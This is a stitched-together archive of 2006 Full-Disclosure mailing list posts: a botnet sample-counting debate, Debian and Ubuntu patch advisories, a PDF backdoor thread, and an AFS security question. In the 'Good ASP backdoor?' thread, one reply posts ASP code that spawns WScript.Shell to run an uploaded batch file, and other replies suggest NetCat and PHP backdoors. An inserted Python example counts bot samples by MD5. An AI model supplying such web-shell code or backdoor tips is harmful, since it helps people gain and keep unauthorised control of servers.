Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On 9/15/06, Richard Golodner <[EMAIL PROTECTED]> wrote:
> As we had seen today everybody has an opinion about how the Botnet
> metrics are computed. I have been reading Gadi's post for many years now and
> believe he is a very knowledgeable and competent person. Give the guy a
> break, he has supplied us with very useful and interesting facts on Botnets
> and that is a lot more than I see coming from all the rest of the group
> involved in this thread.
> Where is everyone else's data?

I have data collected over 5 class B's via darknet. Of course they are all 10.1.x.x, with only 1 virtual host per /16. Seems like I am guessing.

Not that I don't trust G, just wanted to see if I could goad him into releasing some data (as has been called for)

-JP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
As we had seen today everybody has an opinion about how the Botnet metrics are computed. I have been reading Gadi's posts for many years now and believe he is a very knowledgeable and competent person. Give the guy a break, he has supplied us with very useful and interesting facts on Botnets and that is a lot more than I see coming from all the rest of the group involved in this thread.

Where is everyone else's data?

Richard Golodner
[Full-disclosure] [SECURITY] [DSA 1160-2] New Mozilla packages fix several vulnerabilities
Debian Security Advisory DSA 1160-2                  [EMAIL PROTECTED]
http://www.debian.org/security/                       Martin Schulze
September 15th, 2006                 http://www.debian.org/security/faq

Package        : mozilla
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2006-2779 CVE-2006-3805 CVE-2006-3806 CVE-2006-3807 CVE-2006-3808 CVE-2006-3809 CVE-2006-3810
CERT advisories: VU#466673 VU#655892 VU#687396 VU#876420 VU#911004
BugTraq IDs    : 18228 19181

The latest security updates of Mozilla introduced a regression that led to a dysfunctional attachment panel, which warrants a correction to fix this issue. For reference please find below the original advisory text:

Several security related problems have been discovered in Mozilla and derived products. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities:

CVE-2006-2779
    Mozilla team members discovered several crashes during testing of the browser engine showing evidence of memory corruption which may also lead to the execution of arbitrary code. The last bit of this problem will be corrected with the next update. You can prevent any trouble by disabling Javascript. [MFSA-2006-32]

CVE-2006-3805
    The Javascript engine might allow remote attackers to execute arbitrary code. [MFSA-2006-50]

CVE-2006-3806
    Multiple integer overflows in the Javascript engine might allow remote attackers to execute arbitrary code. [MFSA-2006-50]

CVE-2006-3807
    Specially crafted Javascript allows remote attackers to execute arbitrary code. [MFSA-2006-51]

CVE-2006-3808
    Remote AutoConfig (PAC) servers could execute code with elevated privileges via a specially crafted PAC script. [MFSA-2006-52]

CVE-2006-3809
    Scripts with the UniversalBrowserRead privilege could gain UniversalXPConnect privileges and possibly execute code or obtain sensitive data. [MFSA-2006-53]

CVE-2006-3810
    A cross-site scripting vulnerability allows remote attackers to inject arbitrary web script or HTML. [MFSA-2006-54]

For the stable distribution (sarge) these problems have been fixed in version 1.7.8-1sarge7.2.2.

For the unstable distribution (sid) these problems won't be fixed since its end of lifetime has been reached and the package will soon be removed.

We recommend that you upgrade your mozilla package.

Upgrade Instructions

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge

Source archives:
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
I can't present data, but I'll offer the opinion that Gadi is pretty much on track with figures and numbers. In fact his stats are on the lower side. Our current intel reports indicate overall incidents by "Zombie machines on organization's network / bots / use of network by BotNets" = 20%, which is ANY NET based data sets for incident mgmt. This indicates a 36% increase from July 2004 - June 2005 with a mean "unknown base" being equated to 15.1%. This percent implies the rate of fresh nodes being propagated, or rather the rate of growth for Botnets!! Hypothetically, you can, if you flatline these stats against whatever data sets you have ... I'll leave you all to your better judgement :)-

/pd

On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> On Thu, 14 Sep 2006, Dude VanWinkle wrote:
> > On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> > > This counts bot samples. Whether they are variants (changed) or
> > > insignificant changes such as only the IP address to the C&C, they are
> > > counted as unique.
> >
> > So if you have multiple machines NAT'ed under one IP, that is one pot.
> > err bot eh? OK.
>
> And if I see 10 bots using the same address on a dynamic range.. ever heard
> of DHCP? The number crunching schemes are never perfect but they are pretty good.
>
> I count, much like many others, unique IPs. A bot is defined as an
> instance of an installed Trojan horse. One machine may have (and probably
> does have) several. We can count IPs and we do.
>
> 3.5 Million hosts, note, for spam alone. The total population count is
> mind-boggling. I believe spamhaus has it pinned at 3.2 millions, others
> have higher numbers. That's about where it is for EMAIL based spam, per day.
>
> > > This is why we now run different sharing projects between established
> > > honey nets.
> >
> > So you don't count botnets that detect honeynets eh?
>
> Honey pot detection is an interesting field, I am familiar with it and even
> consider myself somewhat of a knowledgeable person on it, but there
> are those who research it actively.
>
> As interesting as it may be, it's not much of a field yet, sorry to
> say. Honey pots of different kinds work marvelously.
>
> Not all our sources for samples are the same. It would be silly of me to
> divulge them all (especially as personally I have no use for samples these
> days and others do). Still, we can only report what we see, what do you see?
>
> > > > or other trivial changes? Do you attempt to correct for complex polymorphic
> > > > variants?
> >
> > Nah, just contributors who don't all have publicly routable IP's and
> > this herders that know about VMware/Honeywall
> >
> > > There aren't many of those.. really. :)
> >
> > Really? Ok.
> >
> > > > > Further, the anti virus world sees about the same numbers.
> >
> > Using the same methods?
>
> And their reporting user-base, alliances and sharing partners, and what
> not. Yes. Do you think all bots are extremely smart rootkits? I am
> quite happy to say most botnets are nothing if not the re-use of old code,
> which is freely available, using the same old methods.
> There are other types of malware out there.
>
> > > > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> > > > > 15K avg bot samples a month, as well.
> >
> > Gotcha, you MS and Symantec share numbers based of who doesn't know how
> > to disable your detection methods
>
> You assume too much Dude.
>
> Still, you are right, 100%. I can only detect what I know how to detect.
> But samples are not the only way to follow botnets, and there are
> many ends on how to approach one problem.
>
> Cryptic? I suppose, but hey, Google for methods, see what you find, and
> tell me what you think.
>
> I believe we have pretty good coverage, but I also need to admit most
> anti viruses do not cover bot detection very well.
>
> > I am just saying, the larger the organization, the sharper the focus
> > from the other side. Maybe a loose coalition of known non-bullshitters
> > would have a more accurate picture.
>
> The picture you got is pretty accurate. Don't take my word for it
> though. I am happy to examine and share (as much as I can, which is more
> than enough to show the numbers (lower numbers) we chose to show in the
> article.
>
> What numbers do you need? What makes you doubt what we have given? I'd be
> more than happy to answer any question you have or counter-numbers you
> have, but your love for me is as irrelevant as you calling me a ***
> when you don't show your own data or challenge mine with
> actual questions like Dave (the other dave) did.
>
> Thanks,
>
> Gadi.
>
> > still love ja tho Gadi,
> >
> > -JP
> >
> > > > Got a link/quote/reference to that? Does Ziv explain the methodology that
> > > > they are using?
> > >
> > > Nope, but I will ask. Most of the numbers I get are at 15K. I can only
> > > prove *on my own* without relying on other sources, as reliable as they
> > > may be, 12K, which is the number we mentioned in the article. We were
> > > being conservative due to that reason, but the number is higher.
> > >
> > > > > I don't know what others may be seeing, but this is our best estimate
> > > > > as to what's going on with the number of unique samples released
> > > > > every mont
[Full-disclosure] Re: Backdooring PDF Files
It really does take effect in my virtual machine: XP SP2 + PDF reader version 7.0.1.2005030700
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On Thu, 14 Sep 2006, Dude VanWinkle wrote:
> On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> > This counts bot samples. Whether they are variants (changed) or
> > insignificant changes such as only the IP address to the C&C, they are
> > counted as unique.
>
> So if you have multiple machines NAT'ed under one IP, that is one pot.
> err bot eh? OK.

And if I see 10 bots using the same address on a dynamic range.. ever heard of DHCP? The number crunching schemes are never perfect but they are pretty good.

I count, much like many others, unique IPs. A bot is defined as an instance of an installed Trojan horse. One machine may have (and probably does have) several. We can count IPs and we do.

3.5 Million hosts, note, for spam alone. The total population count is mind-boggling. I believe spamhaus has it pinned at 3.2 millions, others have higher numbers. That's about where it is for EMAIL based spam, per day.

> > This is why we now run different sharing projects between established
> > honey nets.
>
> So you don't count botnets that detect honeynets eh?

Honey pot detection is an interesting field, I am familiar with it and even consider myself somewhat of a knowledgeable person on it, but there are those who research it actively.

As interesting as it may be, it's not much of a field yet, sorry to say. Honey pots of different kinds work marvelously.

Not all our sources for samples are the same. It would be silly of me to divulge them all (especially as personally I have no use for samples these days and others do). Still, we can only report what we see, what do you see?

> > > or other trivial changes? Do you attempt to correct for complex
> > > polymorphic variants?
>
> Nah, just contributors who don't all have publicly routable IP's and
> this herders that know about VMware/Honeywall
>
> > There aren't many of those.. really. :)
>
> Really? Ok.
>
> > > > Further, the anti virus world sees about the same numbers.
>
> Using the same methods?

And their reporting user-base, alliances and sharing partners, and what not. Yes. Do you think all bots are extremely smart rootkits? I am quite happy to say most botnets are nothing if not the re-use of old code, which is freely available, using the same old methods. There are other types of malware out there.

> > > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> > > > 15K avg bot samples a month, as well.
>
> Gotcha, you MS and Symantec share numbers based of who doesn't know how
> to disable your detection methods

You assume too much Dude.

Still, you are right, 100%. I can only detect what I know how to detect. But samples are not the only way to follow botnets, and there are many ends on how to approach one problem.

Cryptic? I suppose, but hey, Google for methods, see what you find, and tell me what you think.

I believe we have pretty good coverage, but I also need to admit most anti viruses do not cover bot detection very well.

> I am just saying, the larger the organization, the sharper the focus
> from the other side. Maybe a loose coalition of known non-bullshitters
> would have a more accurate picture.

The picture you got is pretty accurate. Don't take my word for it though. I am happy to examine and share (as much as I can, which is more than enough to show the numbers (lower numbers) we chose to show in the article.

What numbers do you need? What makes you doubt what we have given? I'd be more than happy to answer any question you have or counter-numbers you have, but your love for me is as irrelevant as you calling me a *** when you don't show your own data or challenge mine with actual questions like Dave (the other dave) did.

Thanks,

Gadi.

> still love ja tho Gadi,
>
> -JP
>
> > > Got a link/quote/reference to that? Does Ziv explain the methodology
> > > that they are using?
> >
> > Nope, but I will ask. Most of the numbers I get are at 15K. I can only
> > prove *on my own* without relying on other sources, as reliable as they
> > may be, 12K, which is the number we mentioned in the article. We were
> > being conservative due to that reason, but the number is higher.
> >
> > > > I don't know what others may be seeing, but this is our best estimate
> > > > as to what's going on with the number of unique samples released
> > > > every month.
> > > >
> > > > Jose Nazario from Arbor replied on the botnets list that he sees
> > > > similar numbers.
> > > >
> > > > I hope this helps... what are you looking to hear?
> > >
> > > Some kind of explanation for the huge disjunction between these numbers
> > > and our instinctive ideas about what's possible. Of course, being
> >
> > I followed you this far, but to be honest, your ideas (what are
> > they?) are indeed very far from reality... :)
> >
> > > un-worked-out intuitive estimates, such ideas are of course entirely
> > > likely to be off the mark, but off the mark by two orders of magnitude? Hence
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> This counts bot samples. Whether they are variants (changed) or
> insignificant changes such as only the IP address to the C&C, they are
> counted as unique.

So if you have multiple machines NAT'ed under one IP, that is one pot. err bot eh? OK.

> This is why we now run different sharing projects between established
> honey nets.

So you don't count botnets that detect honeynets eh?

> > or other trivial changes? Do you attempt to correct for complex polymorphic
> > variants?

Nah, just contributors who don't all have publicly routable IP's and this herders that know about VMware/Honeywall

> There aren't many of those.. really. :)

Really? Ok.

> > > Further, the anti virus world sees about the same numbers.

Using the same methods?

> > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> > > 15K avg bot samples a month, as well.

Gotcha, you MS and Symantec share numbers based of who doesn't know how to disable your detection methods

I am just saying, the larger the organization, the sharper the focus from the other side. Maybe a loose coalition of known non-bullshitters would have a more accurate picture.

still love ja tho Gadi,

-JP

> > Got a link/quote/reference to that? Does Ziv explain the methodology that
> > they are using?
>
> Nope, but I will ask. Most of the numbers I get are at 15K. I can only
> prove *on my own* without relying on other sources, as reliable as they
> may be, 12K, which is the number we mentioned in the article. We were
> being conservative due to that reason, but the number is higher.
>
> > > I don't know what others may be seeing, but this is our best estimate
> > > as to what's going on with the number of unique samples released
> > > every month.
> > >
> > > Jose Nazario from Arbor replied on the botnets list that he sees
> > > similar numbers.
> > >
> > > I hope this helps... what are you looking to hear?
> >
> > Some kind of explanation for the huge disjunction between these numbers
> > and our instinctive ideas about what's possible. Of course, being
>
> I followed you this far, but to be honest, your ideas (what are
> they?) are indeed very far from reality... :)
>
> > un-worked-out intuitive estimates, such ideas are of course entirely likely
> > to be off the mark, but off the mark by two orders of magnitude? Hence the
> > request for more methodological details.
>
> No problem, I quite understand. There is not that much science to it
> really:
> "Yo, how many unique samples do you see?" as a lone dataset if they won't
> share.
> "Yo, how many unique samples do we all see?" if they share.
> "Yo, how many unique samples do others see?"
>
> AVG is 15K, I can prove *on my own* 12K... counting banking/phishing
> trojan horses, general purpose trojans, dialers, etc (from the large bot
> families).
>
> Gadi.
>
> > cheers,
> > DaveK
> > --
> > Can't think of a witty .sigline today
> >
> > ___
> > To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> > All list and server information are public and available to law enforcement
> > upon request.
> > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On 9/14/06, Jose Nazario <[EMAIL PROTECTED]> wrote:
> i guess i'm curious about your position, then, and what you're meaning by
> "our instinctive ideas about what's possible".

You see, the universe operates with a distinct prejudice towards individuals with an inclination towards lunacy... they should have covered this in douchebaggery 101 f'er cryin' out loud!

-JP
Re: [Full-disclosure] Good ASP backdoor?
Nothing spiffing but it works,

<%@ Page language="VB" Debug="true" aspcompat="true" %>
<% shell("C:\Program Files\WebApp\Uploads\owned.bat") %>

Sub blah()
Dim SpawnShell = server.CreateObject("WScript.Shell")
SpawnShell.Run("C:\Program Files\WebApp\Uploads\owned.bat")
End sub

then just upload your tools and run via the bat file. Does the job.

On 14/09/06, Jason Miller <[EMAIL PROTECTED]> wrote:
> http://replica-solutions.de/
> has some php based ones, check it out
>
> On 9/14/06, Exibar <[EMAIL PROTECTED]> wrote:
> > NetCat is a tried and true favorite
> >
> > - Original Message -
> > From: "Lachniet, Mark" <[EMAIL PROTECTED]>
> > To:
> > Sent: Thursday, September 14, 2006 2:44 PM
> > Subject: [Full-disclosure] Good ASP backdoor?
> >
> > > Can anyone suggest a good backdoor for placing on a IIS server when you
> > > can upload a file to document root? For example an all-in-one tool with
> > > upload, download, command execution, etc. There are several basic ones
> > > out there - I was wondering if anyone ever wrote a really spiffy one.
> > >
> > > Thanks in advance,
> > >
> > > Mark Lachniet

--
regards
c0ntex
Re: [Full-disclosure] Good ASP backdoor?
http://replica-solutions.de/
has some php based ones, check it out

On 9/14/06, Exibar <[EMAIL PROTECTED]> wrote:
> NetCat is a tried and true favorite
>
> - Original Message -
> From: "Lachniet, Mark" <[EMAIL PROTECTED]>
> To:
> Sent: Thursday, September 14, 2006 2:44 PM
> Subject: [Full-disclosure] Good ASP backdoor?
>
> > Can anyone suggest a good backdoor for placing on a IIS server when you
> > can upload a file to document root? For example an all-in-one tool with
> > upload, download, command execution, etc. There are several basic ones
> > out there - I was wondering if anyone ever wrote a really spiffy one.
> >
> > Thanks in advance,
> >
> > Mark Lachniet
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On Thu, 14 Sep 2006, Dave "No, not that one" Korn wrote:
> Can you go into detail about the methodology you're using here? How do
> you "get to a number" of 15,000 from a number "between 200 and 800"?
> Is this a statistical extrapolation, or are you saying that your
> honeynet gets 200 to 800 unique samples a month, and so does that one
> over there, and that one, and that one and they all add up to 15000?
> Do you attempt to correct for variants that are simply re-packed using a
> different compressor, or other trivial changes? Do you attempt to
> correct for complex polymorphic variants?

my numbers are based on unique MD5 values. the bulk of those are minor variants on a theme, ie repackaged bots or reconfigured bots, maybe a new module thrown in or something. only a small handful, maybe a dozen or so, are really new bots every month. very rarely do we see new bots or new capabilities added. the last major change was the use of the MS06-040 netapi exploit.

the bulk of the bot binaries i see are derivatives of well known families. very few new families emerge in any given timeframe, but in the HTTP bot world, we're starting to see people develop tools and reuse them.

unique bot samples, ~12-15k or higher a month. many independent teams can back that ballpark figure up. new bot samples, truly new like i outlined above, is far less. about three orders of magnitude less.

by the way, in this day and age the bulk of people do not bother with polymorphism. they achieve it not through the classic - and elegant - methods of self modifying code but instead by churning out new bots fast and furious. same end result, though: confuse the naive, static detection tools out there.

> Some kind of explanation for the huge disjunction between these numbers
> and our instinctive ideas about what's possible. Of course, being
> un-worked-out intuitive estimates, such ideas are of course entirely
> likely to be off the mark, but off the mark by two orders of magnitude?
> Hence the request for more methodological details.

i guess i'm curious about your position, then, and what you're meaning by "our instinctive ideas about what's possible". it sounds like we're on the same page, but you may feel it's hyping the problem to talk about new bots based on unique MD5 values. it's not my favorite way of thinking about it, but it is easily underscored by a real-world fact: many AV vendors fail to detect the same bot source simply repackaged or re-configured (ie a new IRC server, everything else the same). hence, each new MD5 means a new detection hit for them. so, hype has a real-world backing, namely AV detection issues.

jose nazario, ph.d. [EMAIL PROTECTED]
http://monkey.org/~jose/
http://monkey.org/~jose/secnews.html
http://www.wormblog.com/
Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers
On Thu, 14 Sep 2006, Dave "No, not that one" Korn wrote:
> Can you go into detail about the methodology you're using here? How do
> you "get to a number" of 15,000 from a number "between 200 and 800"? Is

My comment here was in regard to what most honey nets see.

> this a statistical extrapolation, or are you saying that your honeynet gets
> 200 to 800 unique samples a month, and so does that one over there, and that
> one, and that one and they all add up to 15000? Do you attempt to

Yes. Also, some are large enough to get to that number, and there are other sources as well such as the AV community or the Microsoft data... as examples.

> correct for variants that are simply re-packed using a different compressor,

This counts bot samples. Whether they are variants (changed) or insignificant changes such as only the IP address to the C&C, they are counted as unique.

This is why we now run different sharing projects between established honey nets.

> or other trivial changes? Do you attempt to correct for complex polymorphic
> variants?

There aren't many of those.. really. :)

> > Further, the anti virus world sees about the same numbers.
> >
> > The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> > 15K avg bot samples a month, as well.
>
> Got a link/quote/reference to that? Does Ziv explain the methodology that
> they are using?

Nope, but I will ask. Most of the numbers I get are at 15K. I can only prove *on my own* without relying on other sources, as reliable as they may be, 12K, which is the number we mentioned in the article. We were being conservative due to that reason, but the number is higher.

> > I don't know what others may be seeing, but this is our best estimate
> > as to what's going on with the number of unique samples released
> > every month.
> >
> > Jose Nazario from Arbor replied on the botnets list that he sees
> > similar numbers.
> >
> > I hope this helps... what are you looking to hear?
>
> Some kind of explanation for the huge disjunction between these numbers
> and our instinctive ideas about what's possible. Of course, being

I followed you this far, but to be honest, your ideas (what are they?) are indeed very far from reality... :)

> un-worked-out intuitive estimates, such ideas are of course entirely likely
> to be off the mark, but off the mark by two orders of magnitude? Hence the
> request for more methodological details.

No problem, I quite understand. There is not that much science to it really:
"Yo, how many unique samples do you see?" as a lone dataset if they won't share.
"Yo, how many unique samples do we all see?" if they share.
"Yo, how many unique samples do others see?"

AVG is 15K, I can prove *on my own* 12K... counting banking/phishing trojan horses, general purpose trojans, dialers, etc (from the large bot families).

Gadi.

> cheers,
> DaveK
> --
> Can't think of a witty .sigline today
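Jose's "unique MD5 values" explanation and Gadi's "counted as unique even if only the C&C address changed" remark describe the same counting method. The following added Python illustration (not code from either post) makes the gap concrete: it builds a constructed set of fake bot "binaries" that share one code body but carry different embedded `cnc=host:port` strings (an assumed config format), counts them by raw MD5 and by MD5 after blanking the config, and shows how an exact-hash detector misses every reconfigured build.

```python
"""Two ways of counting bot samples, on constructed data.

The sample bytes, the 'cnc=host:port' config layout and the two
families are all made up for this illustration; they are not real
malware and do nothing when run.
"""
import hashlib
import re
from collections import defaultdict

# Assumed config layout: an ASCII "cnc=<host>:<port>" token inside a fixed body.
CONFIG_RE = re.compile(rb"cnc=[A-Za-z0-9.\-]+:\d+")

FAMILY_A = b"MZ\x90\x00[family-a code: irc join, dcc xfer, scan 445]cnc=PLACEHOLDER:0[pad]"
FAMILY_B = b"MZ\x90\x00[family-b code: http poll, download-exec]cnc=PLACEHOLDER:0[pad]"


def make_sample(body: bytes, cnc: bytes) -> bytes:
    """Stand-in for a rebuilt bot: identical code, only the C&C config patched."""
    return body.replace(b"cnc=PLACEHOLDER:0", b"cnc=" + cnc)


# Constructed "monthly feed": three reconfigurations of family A, one exact
# resubmission of the first, and one genuinely different family.
SAMPLES = [
    make_sample(FAMILY_A, b"irc1.example.net:6667"),
    make_sample(FAMILY_A, b"irc2.example.net:6667"),
    make_sample(FAMILY_A, b"10.0.0.5:7000"),
    make_sample(FAMILY_A, b"irc1.example.net:6667"),  # same bytes as SAMPLES[0]
    make_sample(FAMILY_B, b"panel.example.org:80"),
]


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def count_unique_md5(samples) -> int:
    """The 'unique samples' figure: any byte change is a new sample."""
    return len({md5_hex(s) for s in samples})


def normalize(data: bytes) -> bytes:
    """Blank the volatile config so reconfigured builds hash alike."""
    return CONFIG_RE.sub(b"cnc=XXX", data)


def count_unique_code(samples) -> int:
    """The 'truly new bot' figure: hash of the body with config stripped."""
    return len({md5_hex(normalize(s)) for s in samples})


def group_by_code(samples) -> dict:
    """Map each code-body hash to the set of raw MD5s that share it."""
    groups = defaultdict(set)
    for s in samples:
        groups[md5_hex(normalize(s))].add(md5_hex(s))
    return dict(groups)


class ExactHashDetector:
    """Hash-signature detection as Jose describes it: a repackaged or
    reconfigured build has a brand-new MD5 and is missed until re-signed."""

    def __init__(self, known_samples):
        self.known = {md5_hex(s) for s in known_samples}

    def detects(self, sample: bytes) -> bool:
        return md5_hex(sample) in self.known


def coverage(detector: ExactHashDetector, samples) -> tuple:
    """(detected, total) for a detector run over the feed."""
    hits = sum(1 for s in samples if detector.detects(s))
    return hits, len(samples)


if __name__ == "__main__":
    print("unique MD5:", count_unique_md5(SAMPLES))      # 4
    print("unique code:", count_unique_code(SAMPLES))    # 2
    det = ExactHashDetector(SAMPLES[:1])                 # signed only the first build
    print("exact-hash coverage:", coverage(det, SAMPLES))  # (2, 5)
```

Swap the regex for whatever config-carving a real sample feed exposes; the counting functions stay the same.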
Re: [Full-disclosure] Backdooring PDF Files
On 9/14/06, Hugo Francisco González Robledo <[EMAIL PROTECTED]> wrote:
> I think it depends on the context.
>
> Example 1 (backdoored1.pdf) :
>
> On Ubuntu Linux with Adobe Reader 7.0.1 opens the web page on
> mozilla-firefox without warning.

On FC5 with Acrobat Reader 7.0.8 it opens the page in firefox without warning as well.

-sb
[Full-disclosure] AFS - The Ultimate Solution?
Hi list,

recently I found myself in an argument which I found interesting. This is why I want to pass it on to the list, since neither my friend nor I was able to agree on this. Maybe the broader knowledge of this list will lighten up the matter a bit. Apart from this I think it might interest many of you.

The core of the discussion is a corporate system with several workstations all attached to a single network. This network runs an AFS server which is supplying the corporation's AFS cell. Every workstation boots into a minimal environment which asks for username and password. Afterwards it uses these to connect to the AFS cell and boots one of several available system images which reside on the AFS server. (Both Linux (FC1) and Windows (2000) images are available.)

After booting the OS, several important folders and files are replaced with the user's own data (which only he can access due to Kerberos authentication). For instance the Linux image gets /etc/passwd, /etc/shadow, /home/$USER and some others replaced. The custom /etc/passwd and /etc/shadow will only contain the user himself and the root account in order to prevent brute-forcing the passwords.

It seems like this system is quite secure. Even if an attacker should gain root access locally he would not be able to access anything he didn't own in the first place. (So to say other users' files residing in their private AFS folders.) Also he could cause no destruction to the system because the system is booted from the same image every time. Even if he did something like rm -rf / he would only delete his private files in the home folder.

This is kind of a combination of RemoteBoot and AFS. The well known weakness of RemoteBoot is that - set the case the communication with the image server is not encrypted - it is possible to supply forged images to the workstation. (E.g. by ARP-spoofing the image server.) AFS however uses Kerberos to authenticate and thus is considered secure.

Now my friend claims that this system could go unmanaged for ages since the user's data would remain secure even if security holes were published and exploits released. This seems true. However I kind of refuse to believe that something this simple can truly be secure. The only hole I could come up with is that there would be a remote vulnerability which an attacker would use to access the running workstation of somebody else. However this seems unlikely and quite lame.

Anyone up for anything more sophisticated?

Thanks in advance and happy arguing.

Paul
Re: [Full-disclosure] Good ASP backdoor?
NetCat is a tried and true favorite

- Original Message -
From: "Lachniet, Mark" <[EMAIL PROTECTED]>
Sent: Thursday, September 14, 2006 2:44 PM
Subject: [Full-disclosure] Good ASP backdoor?

> Can anyone suggest a good backdoor for placing on an IIS server when you
> can upload a file to document root? For example an all-in-one tool with
> upload, download, command execution, etc. There are several basic ones
> out there - I was wondering if anyone ever wrote a really spiffy one.
>
> Thanks in advance,
>
> Mark Lachniet
[Full-disclosure] [USN-346-2] Fixed linux-restricted-modules-2.6.15 for previous Linux kernel update
===========================================================
Ubuntu Security Notice USN-346-2             September 14, 2006
linux-restricted-modules-2.6.15 regression fix
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  avm-fritz-firmware-2.6.15-26                         2.6.15.11-4
  avm-fritz-kernel-source                              2.6.15.11-4
  fglrx-control                                        2.6.15.11-4
  fglrx-kernel-source                                  2.6.15.11-4
  linux-restricted-modules-2.6.15-26-386               2.6.15.11-4
  linux-restricted-modules-2.6.15-26-686               2.6.15.11-4
  linux-restricted-modules-2.6.15-26-amd64-generic     2.6.15.11-4
  linux-restricted-modules-2.6.15-26-amd64-k8          2.6.15.11-4
  linux-restricted-modules-2.6.15-26-amd64-xeon        2.6.15.11-4
  nic-restricted-firmware-2.6.15-26-386-di             2.6.15.11-4
  nic-restricted-firmware-2.6.15-26-amd64-generic-di   2.6.15.11-4
  nic-restricted-modules-2.6.15-26-386-di              2.6.15.11-4
  nic-restricted-modules-2.6.15-26-amd64-generic-di    2.6.15.11-4
  nvidia-glx                                           2.6.15.11-4
  nvidia-glx-dev                                       2.6.15.11-4
  nvidia-glx-legacy                                    2.6.15.11-4
  nvidia-glx-legacy-dev                                2.6.15.11-4
  nvidia-kernel-source                                 2.6.15.11-4
  nvidia-legacy-kernel-source                          2.6.15.11-4
  xorg-driver-fglrx                                    2.6.15.11-4
  xorg-driver-fglrx-dev                                2.6.15.11-4

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

Details follow:

USN-346-1 provided an updated Linux kernel to fix several security vulnerabilities. Unfortunately the update broke the binary 'nvidia' driver from linux-restricted-modules. This update corrects this problem. We apologize for the inconvenience.
Updated packages for Ubuntu 6.06 LTS:
[Full-disclosure] Good ASP backdoor?
Can anyone suggest a good backdoor for placing on an IIS server when you can upload a file to document root? For example an all-in-one tool with upload, download, command execution, etc. There are several basic ones out there - I was wondering if anyone ever wrote a really spiffy one.

Thanks in advance,

Mark Lachniet
Re: [Full-disclosure] Backdooring PDF Files
I think it depends on the context.

Example 1 (backdoored1.pdf): On Ubuntu Linux with Adobe Reader 7.0.1 it opens the web page in mozilla-firefox without warning. On Windows XP SP2 with Adobe Reader 7.0.8 it sends a warning about opening the URL.

Example 2 (backdoored2.pdf): On Ubuntu Linux and Windows XP SP2 it does nothing, apparently.

It could be possible to make multi-target attacks :) but other viewers like evince or xpdf don't have any effect :(

Regards!

On Wed, Sep 13, 2006 at 11:06:55PM +0300, Juha-Matti Laurio wrote:
> Proof of Concept for example 1 (backdoored1.pdf) opened with Adobe Reader
> 7.0.8
> (i.e. no browser plug-in used) issued a Security Warning dialog box:
>
> "The document is trying to connect to the site:
> http://www.google.com/owned.html
>
> If you trust the site click "Allow", otherwise click "Block"."
>
> Option Remember my action is in use as well.
>
> When clicking "Allow" this Google page was opened in MSIE (in fact FF is my
> default browser, however).
>
> Am I missing something related to differences between Reader plug-in and
> Reader application?
>
> - Juha-Matti
>
>
> David Kierznowski <[EMAIL PROTECTED]> wrote:
> >
> > Recently, there has been a lot of hype involving backdooring various
> > web technologies. pdp (architect) has done a lot of work centered around
> > this area.
> >
> > I saw Jeremiah Grossman mention PDF's being "BAD", however, I was
> > unable to easily locate any practical reasons as to why. I decided to
> > investigate this a little further.
> >
> > This article discusses two possible backdoor techniques for Adobe
> > Acrobat Reader and Professional. It includes proof of concept code and
> > backdoored PDF documents.
> >
> > The article can be found here:
> > http://michaeldaw.org/

--
Hugo Francisco González Robledo
Instituto Tecnológico de San Luis Potosí
Public key at http://www.honeynet.org.mx
Public key at http://ardilla.zapto.org
Ask Google-Earth where I am: http://ardilla.zapto.org/ubicaHugo.kml
---
Education is what remains after one has forgotten what one learned in school. Albert Einstein
---
Re: [Full-disclosure] the world of botnets article and wrong numbers
Gadi Evron wrote:
> Numbers...
> I can't speak for others, but I can try to answer better than I did
> on the botnets mailing list on whitestar.
>
> On individual honey nets, even rather large ones, the number of unique
> samples often assembled can be somewhere between 200 and 800
> a month.. depending on how wide it is spread and the networks it sits
> on. Which is why many of us cooperate.
>
> From cumulative honey nets monitoring of such smaller (yet very
> effective) nets, and some larger nets, we get to a number of about
> 15K new bot samples every month (Alan Solomon and myself wrote 12K,
> so we underplayed it a bit due to statistics being a bit shaky). So
> the real avg number is somewhere around 15K new unique samples a
> month.

Can you go into detail about the methodology you're using here? How do you "get to a number" of 15,000 from a number "between 200 and 800"? Is this a statistical extrapolation, or are you saying that your honeynet gets 200 to 800 unique samples a month, and so does that one over there, and that one, and that one and they all add up to 15000? Do you attempt to correct for variants that are simply re-packed using a different compressor, or other trivial changes? Do you attempt to correct for complex polymorphic variants?

> Further, the anti virus world sees about the same numbers.
>
> The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> 15K avg bot samples a month, as well.

Got a link/quote/reference to that? Does Ziv explain the methodology that they are using?

> I don't know what others may be seeing, but this is our best estimate
> as to what's going on with the number of unique samples released
> every month.
>
